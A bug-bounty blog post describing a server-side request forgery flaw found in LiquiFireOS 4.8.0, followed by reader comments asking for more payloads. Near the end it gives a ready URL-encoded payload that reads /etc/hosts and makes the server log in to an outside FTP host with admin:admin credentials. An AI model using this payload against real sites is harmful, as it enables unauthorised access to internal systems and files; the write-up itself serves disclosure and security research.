During one bugbounty I found that the target webapp is presenting some 'interesting errors' in responses. ;) As this is always a nice and cool 'hint' to see during pentests/ctfs I decided to dig a little bit more. Below you will find the details for SSRF found in LiquiFireOS. Here we go...
Today we'll start here:
This solutions was 'something new' for me. Example response I found online during bugbounty:
I decided to use Burp Suite and try few of the scenarios described in one of the posts available on the blog:
Few more cases (and sample response):
So it looks like we're talking about version 4.8.0 :) Cool, next:
As you can see (example requests from Intruder) there is a nice part of the link, for example url.
I decided to check some other 'url' :) Results below:
That looks interesting ;> So what is the problem? Maybe the port? Maybe the hostname? I will try to change both of them:
That's nice :) Is there any other parameter available for this kind of modification?
To verify it I decided to read a very nice book for Christmas - called the manual: ;)
You can find few more cool cases and examples there.
As I saw in one of the error messages, there are only 4 possibilities to use: http://, ftp://, file:// and cms://. I decided to use http and ftp:
Nice response. ;)
I decided to check if the target app will be able to do something else for me. For example to log in to some (internal?;)) ftp server. Because I do not have one (in the 'target/bugbounty company' ;)) I decided to use some nice-for-cats-ftp server I found online. Let's try to log in with admin:admin credentials:
Looks promising ;)
If you will see the main page ('of the target') there should be something like this:
Sample payload to use in your URL:
"%3Fset%3Dsource[/etc/hosts]%2Corigin[/etc/]%2Ccategory[2]%2Ctype[DESCRIPTIVESTILLLIFE]%2Chmver[3]%26call%3Durl[ftp:%2f%2fadmin:admin@xxxxxxxxx.pl/]"
Maybe you'll find it useful.
See you next time!
Cheers
hi,
OdpowiedzUsuńdo you still have the user manual of liquidfire os ? i can't find it anywhere. need it for a securtity bug.
hi, unfortunately - no. but I believe you'll find some hints and answers at their webpage: knowledge,liquidpixels,com. hope that helps. :)
OdpowiedzUsuńthanks for watching ;)
cheers
Hey I Escalated this to critical,I only reported it to one program, can not found lot of websites running this
OdpowiedzUsuńI found many webpage has this error but I need more payloads.
OdpowiedzUsuńCool. I believe you already informed the author(s) ;) so now probably it's a good time to talk directly with the vendor about the exploitation scenarios and your other ideas.
UsuńI can help only with legal project/research.
Thanks for watching.
Cheers
Any resources regarding escalation to Critical ?
OdpowiedzUsuńHi,
Usuńthanks for watching. I appreciate it. ;)
Answering: I did not dig deeper for this bug.
Probably a good idea is to check and/or ask the vendor directly: https;// iquidpixels, com
Cheers